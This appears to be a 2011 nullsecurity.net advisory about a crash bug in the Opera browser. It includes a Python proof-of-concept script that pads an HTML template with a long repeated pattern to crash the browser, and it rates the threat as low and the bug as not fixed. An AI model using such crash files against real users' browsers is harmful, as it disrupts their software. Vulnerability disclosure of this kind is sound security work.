=============================================================================== | | ____ _ __ ___ __ __/ / /__ ___ ______ ______(_) /___ __ / _ \/ // / / (_- --- SNIP --- Python script for debugging: --- SNIP ---- #!/usr/bin/python filename = 'poc2.html' content = open('template2.html', 'r').read() buff = '\.]+' * 5000 rc = 300 content2 = content[:rc] + buff + content[rc:] FILE = open(filename,"w") FILE.write(content2) FILE.close() --- SNIP --- template2.html: --- SNIP --- --- SNIP --- IMPACT ====== You can only provoke a crash of the Opera process. THREAT LEVEL ============ Low STATUS ====== Not fixed. DISCLAIMER ========== nullsecurity.net hereby emphasize, that the information which is published here are for education purposes only. nullsecurity.net does not take any responsibility for any abuse or misusage! Copyright (c) 2011 - nullsecurity.net